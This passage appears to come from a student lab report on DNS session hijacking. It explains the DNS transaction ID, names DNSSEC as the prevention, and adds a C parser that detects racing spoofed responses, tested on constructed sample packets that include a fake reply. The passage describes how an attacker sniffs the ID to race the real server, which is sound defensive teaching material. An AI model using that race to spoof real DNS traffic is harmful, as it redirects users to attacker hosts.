Transaction ID is a 16-bit field identifying a specific DNS transaction. The transaction ID is created by the message originator and is copied by the responder into its response message. Using the transaction ID, the DNS client can match responses to its requests.

Question 3: Find a solution to prevent the dns session hijacking attack
Answer: A solution to prevent the dns session hijacking attack is DNSSEC: The Domain Name System Security Extensions (DNSSEC) is a suite of Internet Engineering Task Force (IETF) specifications for securing certain kinds of information provided by the Domain Name System (DNS) as used on Internet Protocol (IP) networks. It is a set of extensions to DNS which provide to DNS clients (resolvers) origin authentication of DNS data, authenticated denial of existence, and data integrity, but not availability or confidentiality. (Wiki)
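As an added example, not part of the lab handout or the student's program, the parser below reads the DNS payload that the Part II program rewrites and flags the trace the attack scenario leaves on the wire: two responses carrying the same transaction ID (the field Question 2 describes) and the same question name but different A records, which is what a sensor sees when the attacker races the real server. The byte arrays are constructed sample packets and the addresses are documentation-range placeholders.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What a detector needs from one DNS payload (the bytes after the UDP header). */
struct dns_view {
    uint16_t id;        /* transaction ID, copied by the responder from the query */
    int is_response;    /* QR bit of the flags */
    char qname[256];    /* first question name, dotted form */
    int has_a;          /* the answer section carried an A record */
    uint32_t a_addr;    /* that IPv4 address, host byte order */
};
static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
/* Read a label sequence at off into out; returns the offset after it, or -1 if truncated.
   A compression pointer (0xc0..) ends the name; the lab's answer record uses 0xc00c. */
static int read_name(const uint8_t *p, size_t len, size_t off, char *out) {
    size_t o = 0;
    while (off < len) {
        uint8_t l = p[off];
        if (l == 0) { out[o ? o - 1 : 0] = '\0'; return (int)off + 1; }
        if ((l & 0xc0) == 0xc0) { out[o] = '\0'; return off + 2 <= len ? (int)off + 2 : -1; }
        if (off + 1 + l > len || o + l + 1 >= 256) return -1;
        memcpy(out + o, p + off + 1, l);
        o += l; out[o++] = '.';
        off += 1 + l;
    }
    return -1;
}
/* Parse the header, first question and first answer (assumes one question). 0 on success, -1 if malformed. */
int parse_dns(const uint8_t *p, size_t len, struct dns_view *v) {
    memset(v, 0, sizeof *v);
    if (len < 12) return -1;
    v->id = rd16(p);
    v->is_response = (p[2] & 0x80) != 0;
    uint16_t qdcount = rd16(p + 4), ancount = rd16(p + 6);
    if (qdcount < 1) return -1;
    int off = read_name(p, len, 12, v->qname);
    if (off < 0 || (size_t)off + 4 > len) return -1;
    off += 4;                                        /* QTYPE + QCLASS */
    if (!v->is_response || ancount == 0) return 0;
    char scratch[256];
    off = read_name(p, len, (size_t)off, scratch);   /* answer NAME */
    if (off < 0 || (size_t)off + 10 > len) return -1;
    uint16_t type = rd16(p + off), rdlen = rd16(p + off + 8);
    off += 10;                                       /* TYPE, CLASS, TTL, RDLENGTH */
    if ((size_t)off + rdlen > len) return -1;
    if (type == 1 && rdlen == 4) {
        v->has_a = 1;
        v->a_addr = ((uint32_t)p[off] << 24) | ((uint32_t)p[off + 1] << 16) | ((uint32_t)p[off + 2] << 8) | p[off + 3];
    }
    return 0;
}
/* The race in Part II leaves a trace a resolver cannot see but a sensor can: two responses with the
   same transaction ID and question but different A records. Returns 1 when a and b form such a pair. */
int is_conflicting_answer(const struct dns_view *a, const struct dns_view *b) {
    return a->is_response && b->is_response && a->has_a && b->has_a
        && a->id == b->id && strcmp(a->qname, b->qname) == 0 && a->a_addr != b->a_addr;
}
/* Constructed samples: a query for google.com with ID 0xAABB, the real answer and a racing fake one.
   203.0.113.10 and 192.0.2.5 are documentation-range placeholders, not real resolutions. */
static const uint8_t QUERY[] = { 0xaa, 0xbb, 0x01, 0x00, 0, 1, 0, 0, 0, 0, 0, 0,
    6, 'g', 'o', 'o', 'g', 'l', 'e', 3, 'c', 'o', 'm', 0, 0, 1, 0, 1 };
static const uint8_t REPLY_REAL[] = { 0xaa, 0xbb, 0x81, 0x80, 0, 1, 0, 1, 0, 0, 0, 0,
    6, 'g', 'o', 'o', 'g', 'l', 'e', 3, 'c', 'o', 'm', 0, 0, 1, 0, 1,
    0xc0, 0x0c, 0, 1, 0, 1, 0, 0, 0x01, 0x2c, 0, 4, 203, 0, 113, 10 };
static const uint8_t REPLY_FAKE[] = { 0xaa, 0xbb, 0x81, 0x80, 0, 1, 0, 1, 0, 0, 0, 0,
    6, 'g', 'o', 'o', 'g', 'l', 'e', 3, 'c', 'o', 'm', 0, 0, 1, 0, 1,
    0xc0, 0x0c, 0, 1, 0, 1, 0, 0, 0x01, 0x2c, 0, 4, 192, 0, 2, 5 };

int main(void) {
    struct dns_view r1, r2;
    parse_dns(REPLY_REAL, sizeof REPLY_REAL, &r1);
    parse_dns(REPLY_FAKE, sizeof REPLY_FAKE, &r2);
    printf("id 0x%04x, conflicting answers: %s\n", r1.id, is_conflicting_answer(&r1, &r2) ? "yes" : "no");
    return 0;
}
```

Because the attacker sniffs the transaction ID rather than guessing it, matching the ID (what the resolver does) cannot reject the fake answer; this duplicate-response check is a detection, and DNSSEC as given in Question 3 is the prevention.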

